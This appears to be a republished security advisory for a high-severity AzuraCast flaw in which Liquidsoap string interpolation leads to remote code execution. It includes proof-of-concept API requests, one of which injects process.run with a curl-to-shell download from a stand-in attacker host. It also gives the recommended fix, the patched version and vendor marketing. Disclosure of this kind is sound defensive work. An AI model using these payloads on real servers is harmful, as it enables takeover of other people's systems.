GHSA-93fx-5qgc-wr38
HIGHAzuraCast: RCE via Liquidsoap string interpolation injection in station metadata and playlist URLs
Blast Radius
azuracast/azuracastReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects Packagist packages — download data is not available via public APIs for these ecosystems.
Description
Summary
AzuraCast's ConfigWriter::cleanUpString() method fails to sanitize Liquidsoap string interpolation sequences (#{...}), allowing authenticated users with StationPermissions::Media or StationPermissions::Profile permissions to inject arbitrary Liquidsoap code into the generated configuration file. When the station is restarted and Liquidsoap parses the config, #{...} expressions are evaluated, enabling arbitrary command execution via Liquidsoap's process.run() function.
Root Cause
File: backend/src/Radio/Backend/Liquidsoap/ConfigWriter.php, line ~1345
public static function cleanUpString(?string $string): string
{
return str_replace(['"', "\n", "\r"], ['\'', '', ''], $string ?? '');
}
This function only replaces " with ' and strips newlines. It does NOT filter:
#{...}— Liquidsoap string interpolation (evaluated as code inside double-quoted strings)\— Backslash escape character
Liquidsoap, like Ruby, evaluates #{expression} inside double-quoted strings. process.run() in Liquidsoap executes shell commands.
Injection Points
All user-controllable fields that pass through cleanUpString() and are embedded in double-quoted strings in the .liq config:
| Field | Permission Required | Config Line |
|---|---|---|
playlist.remote_url | Media | input.http("...") or playlist("...") |
station.name | Profile | name = "..." |
station.description | Profile | description = "..." |
station.genre | Profile | genre = "..." |
station.url | Profile | url = "..." |
backend_config.live_broadcast_text | Profile | settings.azuracast.live_broadcast_text := "..." |
backend_config.dj_mount_point | Profile | input.harbor("...") |
PoC 1: Via Remote Playlist URL (Media permission)
POST /api/station/1/playlists HTTP/1.1
Content-Type: application/json
Authorization: Bearer <API_KEY_WITH_MEDIA_PERMISSION>
{
"name": "Malicious Remote",
"source": "remote_url",
"remote_url": "http://x#{process.run('id > /tmp/pwned')}.example.com/stream",
"remote_type": "stream",
"is_enabled": true
}
The generated liquidsoap.liq will contain:
mksafe(buffer(buffer=5., input.http("http://x#{process.run('id > /tmp/pwned')}.example.com/stream")))
When Liquidsoap parses this, process.run('id > /tmp/pwned') executes as the azuracast user.
PoC 2: Via Station Description (Profile permission)
PUT /api/station/1/profile/edit HTTP/1.1
Content-Type: application/json
Authorization: Bearer <API_KEY_WITH_PROFILE_PERMISSION>
{
"name": "My Station",
"description": "#{process.run('curl http://attacker.com/shell.sh | sh')}"
}
Generates:
description = "#{process.run('curl http://attacker.com/shell.sh | sh')}"
Trigger Condition
The injection fires when the station is restarted, which happens during:
- Normal station restart by any user with
Broadcastingpermission - System updates and maintenance
azuracast:radio:restartCLI command- Docker container restarts
Impact
- Severity: Critical
- Authentication: Required — any station-level user with
MediaorProfilepermission - Impact: Full RCE on the AzuraCast server as the
azuracastuser - CWE: CWE-94 (Code Injection)
Recommended Fix
Update cleanUpString() to escape # and \:
public static function cleanUpString(?string $string): string
{
return str_replace(
['"', "\n", "\r", '\\', '#'],
['\'', '', '', '\\\\', '\\#'],
$string ?? ''
);
}
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐘Packagist | azuracast/azuracast | all versions | 0.23.4 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for azuracast/azuracast. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update azuracast/azuracast to 0.23.4 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-93fx-5qgc-wr38 is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-93fx-5qgc-wr38 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-93fx-5qgc-wr38. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-93fx-5qgc-wr38 in your dependencies?
O3 detects GHSA-93fx-5qgc-wr38 across Packagist dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.